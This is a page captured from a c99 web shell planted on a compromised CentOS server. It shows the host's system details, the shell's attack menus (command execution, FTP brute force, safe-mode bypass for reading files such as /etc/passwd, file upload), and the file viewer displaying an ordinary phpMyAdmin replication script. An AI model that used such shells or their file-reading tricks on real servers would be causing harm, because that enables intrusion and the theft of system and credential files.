!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     server_replication.php (16.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 *
 * @package phpMyAdmin
 */

/**
 *
 */
require_once './libraries/common.inc.php';

/**
 * Does the common work
 */
$GLOBALS['js_include'][] = 'server_privileges.js';
$GLOBALS['js_include'][] = 'replication.js';

require 
'./libraries/server_common.inc.php';
require 
'./libraries/replication.inc.php';
require 
'./libraries/replication_gui.lib.php';
require_once 
'./libraries/server_synchronize.lib.php';

/**
 * Checks if the user is allowed to do what he tries to...
 */
if (! $is_superuser) {
    require 
'./libraries/server_links.inc.php';
    echo 
'<h2>' "\n"
        
PMA_getIcon('s_replication.png')
        . 
__('Replication') . "\n"
        
'</h2>' "\n";
    
PMA_Message::error(__('No Privileges'))->display();
    require 
'./libraries/footer.inc.php';
}

/**
 * Handling control requests
 */
if (isset($GLOBALS['sr_take_action'])) {
    
$refresh false;
    if (isset(
$GLOBALS['slave_changemaster'])) {
        
$_SESSION['replication']['m_username'] = $sr['username'] = PMA_sqlAddslashes($GLOBALS['username']);
        
$_SESSION['replication']['m_password'] = $sr['pma_pw']   = PMA_sqlAddslashes($GLOBALS['pma_pw']);
        
$_SESSION['replication']['m_hostname'] = $sr['hostname'] = PMA_sqlAddslashes($GLOBALS['hostname']);
        
$_SESSION['replication']['m_port']     = $sr['port']     = PMA_sqlAddslashes($GLOBALS['port']);
        
$_SESSION['replication']['m_correct']  = '';
        
$_SESSION['replication']['sr_action_status'] = 'error';
        
$_SESSION['replication']['sr_action_info'] = __('Unknown error');

        
// Attempt to connect to the new master server
        
$link_to_master PMA_replication_connect_to_master($sr['username'], $sr['pma_pw'], $sr['hostname'], $sr['port']);

        if (! 
$link_to_master) {
            
$_SESSION['replication']['sr_action_status'] = 'error';
            
$_SESSION['replication']['sr_action_info'] = sprintf(__('Unable to connect to master %s.'), $sr['hostname']);
        } else {
            
// Read the current master position
            
$position PMA_replication_slave_bin_log_master($link_to_master);

            if (empty(
$position)) {
                
$_SESSION['replication']['sr_action_status'] = 'error';
                
$_SESSION['replication']['sr_action_info'] = __('Unable to read master log position. Possible privilege problem on master.');
            } else {
                
$_SESSION['replication']['m_correct']  = true;

                if (! 
PMA_replication_slave_change_master($sr['username'], $sr['pma_pw'], $sr['hostname'], $sr['port'], $positiontruefalse)) {
                    
$_SESSION['replication']['sr_action_status'] = 'error';
                    
$_SESSION['replication']['sr_action_info'] = __('Unable to change master');
                } else {
                    
$_SESSION['replication']['sr_action_status'] = 'success';
                    
$_SESSION['replication']['sr_action_info'] = sprintf(__('Master server changed succesfully to %s'), $sr['hostname']);
                }
            }
        }
    } elseif (isset(
$GLOBALS['sr_slave_server_control'])) {
        if (
$GLOBALS['sr_slave_action'] == 'reset') {
            
PMA_replication_slave_control("STOP");
            
PMA_DBI_try_query("RESET SLAVE;");
            
PMA_replication_slave_control("START");
        } else {
            
PMA_replication_slave_control($GLOBALS['sr_slave_action'], $GLOBALS['sr_slave_control_parm']);
        }
        
$refresh true;

    } elseif (isset(
$GLOBALS['sr_slave_skip_error'])) {
        
$count 1;
        if (isset(
$GLOBALS['sr_skip_errors_count'])) {
            
$count $GLOBALS['sr_skip_errors_count'] * 1;
        }
        
PMA_replication_slave_control("STOP");
        
PMA_DBI_try_query("SET GLOBAL SQL_SLAVE_SKIP_COUNTER = ".$count.";");
        
PMA_replication_slave_control("START");

    } elseif (isset(
$GLOBALS['sl_sync'])) {
        
// TODO username, host and port could be read from 'show slave status',
        // when asked for a password this might work in more situations then just after changing master (where the master password is stored in session)
        
$src_link PMA_replication_connect_to_master($_SESSION['replication']['m_username'], $_SESSION['replication']['m_password'], $_SESSION['replication']['m_hostname'], $_SESSION['replication']['m_port']);
        
$trg_link null// using null to indicate the current PMA server

        
$data PMA_DBI_fetch_result('SHOW MASTER STATUS'nullnull$src_link); // let's find out, which databases are replicated

        
$do_db     = array();
        
$ignore_db = array();
        
$dblist    = array();

        if (! empty(
$data[0]['Binlog_Do_DB'])) {
            
$do_db     explode(','$data[0]['Binlog_Do_DB']);
        }
        if (! empty(
$data[0]['Binlog_Ignore_DB'])) {
            
$ignore_db explode(','$data[0]['Binlog_Ignore_DB']);
        }

        
$tmp_alldbs PMA_DBI_query('SHOW DATABASES;'$src_link);
        while (
$tmp_row PMA_DBI_fetch_row($tmp_alldbs)) {
            if (
$tmp_row[0] == 'information_schema') {
                continue;
            }
            if (
count($do_db) == 0) {
                if (
array_search($tmp_row[0], $ignore_db) !== false) {
                    continue;
                }
                
$dblist[] = $tmp_row[0];

                
PMA_DBI_query('CREATE DATABASE IF NOT EXISTS '.PMA_backquote($tmp_row[0]), $trg_link);
            } else {
                if (
array_search($tmp_row[0], $do_db) !== false) {
                    
$dblist[] = $tmp_row[0];
                    
PMA_DBI_query('CREATE DATABASE IF NOT EXISTS '.PMA_backquote($tmp_row[0]), $trg_link);
                }
            }
        } 
// end while

        
unset($do_db$ignore_db$data);

        if (isset(
$GLOBALS['repl_data'])) {
            
$include_data true;
        } else {
            
$include_data false;
        }
        foreach (
$dblist as $db) {
            
PMA_replication_synchronize_db($db$src_link$trg_link$include_data);
        }
        
// TODO some form of user feedback error/success would be nice
        //  What happens if $dblist is empty?
        //  or sync failed?
    
}

    if (
$refresh) {
        
Header("Location: "PMA_generate_common_url($GLOBALS['url_params']));
    }
    unset(
$refresh);
}
/**
 * Displays the links
 */
require './libraries/server_links.inc.php';

echo 
'<div id="replication">';
echo 
' <h2>';
echo 
'   <img class="icon" src="' $GLOBALS['pmaThemeImage'] . 's_replication.png"  width="16" height="16" alt="" />';
echo     
__('Replication');
echo 
' </h2>';

// Display error messages
if (isset($_SESSION['replication']['sr_action_status']) && isset($_SESSION['replication']['sr_action_info'])) {
    if (
$_SESSION['replication']['sr_action_status'] == 'error') {
        
PMA_Message::error($_SESSION['replication']['sr_action_info'])->display();
        
$_SESSION['replication']['sr_action_status'] = 'unknown';
    } elseif (
$_SESSION['replication']['sr_action_status'] == 'success') {
        
PMA_Message::success($_SESSION['replication']['sr_action_info'])->display();
        
$_SESSION['replication']['sr_action_status'] = 'unknown';
    }
}

if (
$server_master_status) {
    if (! isset(
$GLOBALS['repl_clear_scr'])) {
        echo 
'<fieldset>';
        echo 
'<legend>' __('Master replication') . '</legend>';
        echo 
__('This server is configured as master in a replication process.');
        echo 
'<ul>';
        echo 
'  <li><a href="#" id="master_status_href">' __('Show master status') . '</a></li>';
        
PMA_replication_print_status_table('master'truefalse);

        echo 
'  <li><a href="#" id="master_slaves_href">' __('Show connected slaves') . '</a></li>';
        
PMA_replication_print_slaves_table(true);

        
$_url_params $GLOBALS['url_params'];
        
$_url_params['mr_adduser'] = true;
        
$_url_params['repl_clear_scr'] = true;

        echo 
'  <li><a href="' PMA_generate_common_url($_url_params) . '" id="master_addslaveuser_href">' __('Add slave replication user') . '</a></li>';
    }

    
// Display 'Add replication slave user' form
    
if (isset($GLOBALS['mr_adduser'])) {
        
PMA_replication_gui_master_addslaveuser();
    } elseif (! isset(
$GLOBALS['repl_clear_scr'])) {
        echo 
"</ul>";
        echo 
"</fieldset>";
    }
} elseif (! isset(
$GLOBALS['mr_configure']) && ! isset($GLOBALS['repl_clear_scr'])) {
    
$_url_params $GLOBALS['url_params'];
    
$_url_params['mr_configure'] = true;

    echo 
'<fieldset>';
    echo 
'<legend>' __('Master replication') . '</legend>';
    echo 
sprintf(__('This server is not configured as master in a replication process. Would you like to <a href="%s">configure</a> it?'), PMA_generate_common_url($_url_params));
    echo 
'</fieldset>';
}

if (isset(
$GLOBALS['mr_configure'])) {
    
// Render the 'Master configuration' section
    
echo '<fieldset>';
    echo 
'<legend>' __('Master configuration') . '</legend>';
    echo 
__('This server is not configured as master server in a replication process. You can choose from either replicating all databases and ignoring certain (useful if you want to replicate majority of databases) or you can choose to ignore all databases by default and allow only certain databases to be replicated. Please select the mode:') . '<br /><br />';

    echo 
'<select name="db_type" id="db_type">';
    echo 
'<option value="all">' __('Replicate all databases; Ignore:') . '</option>';
    echo 
'<option value="ign">' __('Ignore all databases; Replicate:') . '</option>';
    echo 
'</select>';
    echo 
'<br /><br />';
    echo 
__('Please select databases:') . '<br />';
    echo 
PMA_replication_db_multibox();
    echo 
'<br /><br />';
    echo 
__('Now, add the following lines at the end of [mysqld] section in your my.cnf and please restart the MySQL server afterwards.') . '<br />';
    echo 
'<pre id="rep"></pre>';
    echo 
__('Once you restarted MySQL server, please click on Go button. Afterwards, you should see a message informing you, that this server <b>is</b> configured as master');
    echo 
'</fieldset>';
    echo 
'<fieldset class="tblFooters">';
    echo 
' <form method="post" action="server_replication.php" >';
    echo 
PMA_generate_common_hidden_inputs('''');
    echo 
'  <input type="submit" value="' __('Go') . '" id="goButton" />';
    echo 
' </form>';
    echo 
'</fieldset>';

    require 
'./libraries/footer.inc.php';
    exit;
}

echo 
'</div>';

if (! isset(
$GLOBALS['repl_clear_scr'])) {
    
// Render the 'Slave configuration' section
    
echo '<fieldset>';
    echo 
'<legend>' __('Slave replication') . '</legend>';
    if (
$server_slave_status) {
        echo 
'<div id="slave_configuration_gui">';

        
$_url_params $GLOBALS['url_params'];
        
$_url_params['sr_take_action'] = true;
        
$_url_params['sr_slave_server_control'] = true;

        if (
$server_slave_replication[0]['Slave_IO_Running'] == 'No') {
            
$_url_params['sr_slave_action'] = 'start';
        } else {
            
$_url_params['sr_slave_action'] = 'stop';
        }

        
$_url_params['sr_slave_control_parm'] = 'IO_THREAD';
        
$slave_control_io_link PMA_generate_common_url($_url_params);

        if (
$server_slave_replication[0]['Slave_SQL_Running'] == 'No') {
            
$_url_params['sr_slave_action'] = 'start';
        } else {
            
$_url_params['sr_slave_action'] = 'stop';
        }

        
$_url_params['sr_slave_control_parm'] = 'SQL_THREAD';
        
$slave_control_sql_link PMA_generate_common_url($_url_params);

        if (
$server_slave_replication[0]['Slave_IO_Running'] == 'No'
            
|| $server_slave_replication[0]['Slave_SQL_Running'] == 'No'
        
) {
            
$_url_params['sr_slave_action'] = 'start';
        } else {
            
$_url_params['sr_slave_action'] = 'stop';
        }

        
$_url_params['sr_slave_control_parm'] = null;
        
$slave_control_full_link PMA_generate_common_url($_url_params);

        
$_url_params['sr_slave_action'] = 'reset';
        
$slave_control_reset_link PMA_generate_common_url($_url_params);

        
$_url_params $GLOBALS['url_params'];
        
$_url_params['sr_slave_skip_error'] = true;
        
$slave_skip_error_link PMA_generate_common_url($_url_params);

        if (
$server_slave_replication[0]['Slave_SQL_Running'] == 'No') {
            
PMA_Message::error(__('Slave SQL Thread not running!'))->display();
        }
        if (
$server_slave_replication[0]['Slave_IO_Running'] == 'No') {
            
PMA_Message::error(__('Slave IO Thread not running!'))->display();
        }

        
$_url_params $GLOBALS['url_params'];
        
$_url_params['sl_configure'] = true;
        
$_url_params['repl_clear_scr'] = true;

        
$reconfiguremaster_link PMA_generate_common_url($_url_params);

        echo 
__('Server is configured as slave in a replication process. Would you like to:');
        echo 
'<br />';
        echo 
'<ul>';
        echo 
' <li><a href="#" id="slave_status_href">' __('See slave status table') . '</a></li>';
        echo 
PMA_replication_print_status_table('slave'truefalse);
        if (isset(
$_SESSION['replication']['m_correct']) && $_SESSION['replication']['m_correct'] == true) {
            echo 
' <li><a href="#" id="slave_synchronization_href">' __('Synchronize databases with master') . '</a></li>';
            echo 
' <div id="slave_synchronization_gui" style="display: none">';
            echo 
'  <form method="post" action="server_replication.php">';
            echo 
PMA_generate_common_hidden_inputs('''');
            echo 
'   <input type="checkbox" name="repl_struc" value="1" checked="checked" disabled="disabled" /> ' __('Structure') . '<br />'// this is just for vizualization, it has no other purpose
            
echo '   <input type="checkbox" name="repl_data"  value="1" checked="checked" /> ' __('Data') .' <br />';
            echo 
'   <input type="hidden" name="sr_take_action" value="1" />';
            echo 
'   <input type="submit" name="sl_sync" value="' __('Go') . '" />';
            echo 
'  </form>';
            echo 
' </div>';
        }
        echo 
' <li><a href="#" id="slave_control_href">' __('Control slave:') . '</a>';
        echo 
' <div id="slave_control_gui" style="display: none">';
        echo 
'  <ul>';
        echo 
'   <li><a href="'$slave_control_full_link '">' . (($server_slave_replication[0]['Slave_IO_Running'] == 'No' || $server_slave_replication[0]['Slave_SQL_Running'] == 'No') ? __('Full start') : __('Full stop')) . ' </a></li>';
        echo 
'   <li><a href="'$slave_control_reset_link '">' __('Reset slave') . '</a></li>';
        if (
$server_slave_replication[0]['Slave_SQL_Running'] == 'No') {
            echo 
'   <li><a href="' $slave_control_sql_link '">' __('Start SQL Thread only') . '</a></li>';
        } else {
            echo 
'   <li><a href="' $slave_control_sql_link '">' __('Stop SQL Thread only') . '</a></li>';
        }
        if (
$server_slave_replication[0]['Slave_IO_Running'] == 'No') {
            echo 
'   <li><a href="' $slave_control_io_link '">' __('Start IO Thread only') . '</a></li>';
        } else {
            echo 
'   <li><a href="' $slave_control_io_link '">' __('Stop IO Thread only') . '</a></li>';
        }
        echo 
'  </ul>';
        echo 
' </div>';
        echo 
' </li>';
        echo 
' <li><a href="#" id="slave_errormanagement_href">' __('Error management:') . '</a>';
        echo 
' <div id="slave_errormanagement_gui" style="display: none">';
        
PMA_Message::error(__('Skipping errors might lead into unsynchronized master and slave!'))->display();
        echo 
'  <ul>';
        echo 
'   <li><a href="' $slave_skip_error_link '">' __('Skip current error') . '</a></li>';
        echo 
'   <li>' __('Skip next');
        echo 
'    <form method="post" action="server_replication.php">';
        echo 
PMA_generate_common_hidden_inputs('''');
        echo 
'      <input type="text" name="sr_skip_errors_count" value="1" style="width: 30px" />' __('errors.');
        echo 
'              <input type="submit" name="sr_slave_skip_error" value="' __('Go') . '" />';
        echo 
'      <input type="hidden" name="sr_take_action" value="1" />';
        echo 
'    </form></li>';
        echo 
'  </ul>';
        echo 
' </div>';
        echo 
' </li>';
        echo 
' <li><a href="' $reconfiguremaster_link '">' __('Change or reconfigure master server') . '</a></li>';
        echo 
'</ul>';

    } elseif (! isset(
$GLOBALS['sl_configure'])) {
        
$_url_params $GLOBALS['url_params'];
        
$_url_params['sl_configure'] = true;
        
$_url_params['repl_clear_scr'] = true;

        echo 
sprintf(__('This server is not configured as slave in a replication process. Would you like to <a href="%s">configure</a> it?'), PMA_generate_common_url($_url_params));
    }
    echo 
'</div>';
    echo 
'</fieldset>';
}
if (isset(
$GLOBALS['sl_configure'])) {
    
PMA_replication_gui_changemaster("slave_changemaster");
}
require 
'./libraries/footer.inc.php';
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0162 ]--